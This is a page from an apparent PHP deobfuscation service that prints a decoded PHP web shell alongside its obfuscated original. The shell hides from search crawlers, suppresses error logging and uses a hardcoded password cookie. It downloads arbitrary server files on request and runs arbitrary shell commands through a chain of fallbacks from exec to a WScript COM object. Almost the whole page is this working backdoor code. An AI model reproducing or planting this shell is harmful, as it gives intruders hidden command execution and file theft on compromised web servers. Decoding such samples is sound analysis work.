Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php set_time_limit(0); error_reporting(0); @ini_set("error_log", null); @ini_set("lo..
Decoded Output download
<?php
set_time_limit(0);
error_reporting(0);
@ini_set("error_log", null);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@ini_set("output_buffering", 0);
@ini_set("display_errors", 0);
session_start();
date_default_timezone_set("Asia/Jakarta");
$_7 = array_merge($_POST, $_GET);
$_r = "required='required'";
$gcw = "getcwd";
$password = "loveyou";
$bcrypt = ["cost" => 12];
if (!empty($_SERVER["HTTP_USER_AGENT"])) {
$userAgents = [
"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler",
];
if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
header("HTTP/1.0 404 Not Found");
exit();
}
}
if (isset($_7["!@*())!@*(!@()*!@*()!*()@"])) {
echo "<div class='text-center text-muted'>!@*())!@*(!@()*!@*()!*()@</div>";
}
function login() {
global $password;
setcookie("shenna", $password, time() + 3600);
header("HTTP/1.0 404 Mau Ngapain Lurr");
$host = "https://" . $_SERVER['HTTP_HOST'];
$url = $host . "/sadada";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if(curl_errno($ch)){
echo 'Error: ' . curl_error($ch);
}
curl_close($ch);
echo $response;
exit();
}
if (!isset($_SESSION[password_hash($_SERVER["HTTP_HOST"], PASSWORD_BCRYPT, $bcrypt)])) {
if (empty($password) || (isset($_COOKIE["shenna"]) && $_COOKIE["shenna"] === $password)) {
$_SESSION[password_hash($_SERVER["HTTP_HOST"], PASSWORD_BCRYPT, $bcrypt)] = true;
} else {
login();
}
}
if (isset($_7["left"])) {
session_start();
session_destroy();
unset($_COOKIE["shenna"]);
setcookie("shenna", "", time() - 3600);
echo '<script>window.location="' . $_SERVER["PHP_SELF"] . '";</script>';
}
if (isset($_7["opn"]) && $_7["opn"] != "" && $_7["action"] == "download") {
@ob_clean();
$file = $_7["opn"];
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header("Expires: 0");
header("Cache-Control: must-revalidate");
header("Pragma: public");
header("Content-Length: " . filesize($file));
readfile($file);
exit();
}
function w($dir, $perm) {
if (!is_writable($dir)) {
return "<rd>" . $perm . "</rd>";
} else {
return "<gr>" . $perm . "</gr>";
}
}
function s() {
echo '<style>table{display:none;}</style><div class="table-responsive"><hr></div>';
}
function ok() {
echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function er() {
echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function sz($byt) {
$typ = ["B", "KB", "MB", "GB", "TB"];
for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++);
return round($byt, 2) . " " . $typ[$i];
}
function ia() {
$ia = "";
if (getenv("HTTP_CLIENT_IP")) {
$ia = getenv("HTTP_CLIENT_IP");
} elseif (getenv("HTTP_X_FORWARDED_FOR")) {
$ia = getenv("HTTP_X_FORWARDED_FOR");
} elseif (getenv("HTTP_X_FORWARDED")) {
$ia = getenv("HTTP_X_FORWARDED");
} elseif (getenv("HTTP_FORWARDED_FOR")) {
$ia = getenv("HTTP_FORWARDED_FOR");
} elseif (getenv("HTTP_FORWARDED")) {
$ia = getenv("HTTP_FORWARDED");
} elseif (getenv("REMOTE_ADDR")) {
$ia = getenv("REMOTE_ADDR");
} else {
$ia = "Unknown IP.";
}
return $ia;
}
function exe($in, $re = false) {
$out = "";
try {
if ($re) {
$in = $in . " 2>&1";
}
if (function_exists("exec")) {
@exec($in, $out);
$out = @join("
", $out);
} elseif (function_exists("passthru")) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists("system")) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists("shell_exec")) {
$out = shell_exec($in);
} elseif (function_exists("popen") && function_exists("pclose")) {
if (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
} elseif (function_exists("proc_open")) {
$pipes = [];
$process = proc_open($in . " 2>&1", [["pipe", "w"], ["pipe", "w"], ["pipe", "w"]], $pipes, null);
$out = @stream_get_contents($pipes[1]);
} elseif (class_exists("COM")) {
$alfaWs = new COM("WScript.shell");
$exec = $alfaWs->exec("cmd.exe /c " . $_POST["cmd"]);
$stdout = $exec->StdOut();
$out = $stdout->ReadAll();
}
} catch (Exception $e) { }
return $out;
}
function exe_root($set, $sad) {
$x = "preg_match";
$xx = "2>&1";
if (!$x("/" . $xx . "/i", $set)) {
$set = $set . " " . $xx;
}
$a = "function_exists";
$b = "proc_open";
$c = "htmlspecialchars";
$d = "stream_get_contents";
if ($a($b)) {
$ps = $b($set, [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "r"]], $pink, $sad);
return $d($pink[1]);
} else {
return "proc_open function is disabled !";
}
}
function p($file) {
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000) {
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
$i .= $p & 0x0100 ? "r" : "-";
$i .= $p & 0x0080 ? "w" : "-";
$i .= $p & 0x0040 ? ($p & 0x0800 ? "s" : "x") : ($p & 0x0800 ? "S" : "-");
$i .= $p & 0x0020 ? "r" : "-";
$i .= $p & 0x0010 ? "w" : "-";
$i .= $p & 0x0008 ? ($p & 0x0400 ? "s" : "x") : ($p & 0x0400 ? "S" : "-");
$i .= $p & 0x0004 ? "r" : "-";
$i .= $p & 0x0002 ? "w" : "-";
$i .= $p & 0x0001 ? ($p & 0x0200 ? "t" : "x") : ($p & 0x0200 ? "T" : "-");
return $i;
}
if (isset($_7["dir"])) {
$dir = $_7["dir"];
chdir($dir);
} else {
$dir = $gcw();
}
?>Did this file decode correctly?
Original Code
<?php
set_time_limit(0);
error_reporting(0);
@ini_set("error_log", null);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@ini_set("output_buffering", 0);
@ini_set("display_errors", 0);
session_start();
date_default_timezone_set("Asia/Jakarta");
$_7 = array_merge($_POST, $_GET);
$_r = "required='required'";
$gcw = "getcwd";
$password = "loveyou";
$bcrypt = ["cost" => 12];
if (!empty($_SERVER["HTTP_USER_AGENT"])) {
$userAgents = [
"Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler",
];
if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
header("HTTP/1.0 404 Not Found");
exit();
}
}
if (isset($_7["!@*())!@*(!@()*!@*()!*()@"])) {
echo "<div class='text-center text-muted'>!@*())!@*(!@()*!@*()!*()@</div>";
}
function login() {
global $password;
setcookie("shenna", $password, time() + 3600);
header("HTTP/1.0 404 Mau Ngapain Lurr");
$host = "https://" . $_SERVER['HTTP_HOST'];
$url = $host . "/sadada";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if(curl_errno($ch)){
echo 'Error: ' . curl_error($ch);
}
curl_close($ch);
echo $response;
exit();
}
if (!isset($_SESSION[password_hash($_SERVER["HTTP_HOST"], PASSWORD_BCRYPT, $bcrypt)])) {
if (empty($password) || (isset($_COOKIE["shenna"]) && $_COOKIE["shenna"] === $password)) {
$_SESSION[password_hash($_SERVER["HTTP_HOST"], PASSWORD_BCRYPT, $bcrypt)] = true;
} else {
login();
}
}
if (isset($_7["left"])) {
session_start();
session_destroy();
unset($_COOKIE["shenna"]);
setcookie("shenna", "", time() - 3600);
echo '<script>window.location="' . $_SERVER["PHP_SELF"] . '";</script>';
}
if (isset($_7["opn"]) && $_7["opn"] != "" && $_7["action"] == "download") {
@ob_clean();
$file = $_7["opn"];
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header("Expires: 0");
header("Cache-Control: must-revalidate");
header("Pragma: public");
header("Content-Length: " . filesize($file));
readfile($file);
exit();
}
function w($dir, $perm) {
if (!is_writable($dir)) {
return "<rd>" . $perm . "</rd>";
} else {
return "<gr>" . $perm . "</gr>";
}
}
function s() {
echo '<style>table{display:none;}</style><div class="table-responsive"><hr></div>';
}
function ok() {
echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function er() {
echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function sz($byt) {
$typ = ["B", "KB", "MB", "GB", "TB"];
for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++);
return round($byt, 2) . " " . $typ[$i];
}
function ia() {
$ia = "";
if (getenv("HTTP_CLIENT_IP")) {
$ia = getenv("HTTP_CLIENT_IP");
} elseif (getenv("HTTP_X_FORWARDED_FOR")) {
$ia = getenv("HTTP_X_FORWARDED_FOR");
} elseif (getenv("HTTP_X_FORWARDED")) {
$ia = getenv("HTTP_X_FORWARDED");
} elseif (getenv("HTTP_FORWARDED_FOR")) {
$ia = getenv("HTTP_FORWARDED_FOR");
} elseif (getenv("HTTP_FORWARDED")) {
$ia = getenv("HTTP_FORWARDED");
} elseif (getenv("REMOTE_ADDR")) {
$ia = getenv("REMOTE_ADDR");
} else {
$ia = "Unknown IP.";
}
return $ia;
}
function exe($in, $re = false) {
$out = "";
try {
if ($re) {
$in = $in . " 2>&1";
}
if (function_exists("\x65\x78\x65\x63")) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) {
$out = shell_exec($in);
} elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) {
if (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
} elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) {
$pipes = [];
$process = proc_open($in . " 2>&1", [["pipe", "w"], ["pipe", "w"], ["pipe", "w"]], $pipes, null);
$out = @stream_get_contents($pipes[1]);
} elseif (class_exists("COM")) {
$alfaWs = new COM("WScript.shell");
$exec = $alfaWs->exec("cmd.exe /c " . $_POST["cmd"]);
$stdout = $exec->StdOut();
$out = $stdout->ReadAll();
}
} catch (Exception $e) { }
return $out;
}
function exe_root($set, $sad) {
$x = "preg_match";
$xx = "2>&1";
if (!$x("/" . $xx . "/i", $set)) {
$set = $set . " " . $xx;
}
$a = "function_exists";
$b = "proc_open";
$c = "htmlspecialchars";
$d = "stream_get_contents";
if ($a($b)) {
$ps = $b($set, [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "r"]], $pink, $sad);
return $d($pink[1]);
} else {
return "proc_open function is disabled !";
}
}
function p($file) {
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000) {
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
$i .= $p & 0x0100 ? "r" : "-";
$i .= $p & 0x0080 ? "w" : "-";
$i .= $p & 0x0040 ? ($p & 0x0800 ? "s" : "x") : ($p & 0x0800 ? "S" : "-");
$i .= $p & 0x0020 ? "r" : "-";
$i .= $p & 0x0010 ? "w" : "-";
$i .= $p & 0x0008 ? ($p & 0x0400 ? "s" : "x") : ($p & 0x0400 ? "S" : "-");
$i .= $p & 0x0004 ? "r" : "-";
$i .= $p & 0x0002 ? "w" : "-";
$i .= $p & 0x0001 ? ($p & 0x0200 ? "t" : "x") : ($p & 0x0200 ? "T" : "-");
return $i;
}
if (isset($_7["dir"])) {
$dir = $_7["dir"];
chdir($dir);
} else {
$dir = $gcw();
}
Function Calls
| None |
Stats
| MD5 | 50a38dbee9927bec77743fcf325ca9ef |
| Eval Count | 0 |
| Decode Time | 57 ms |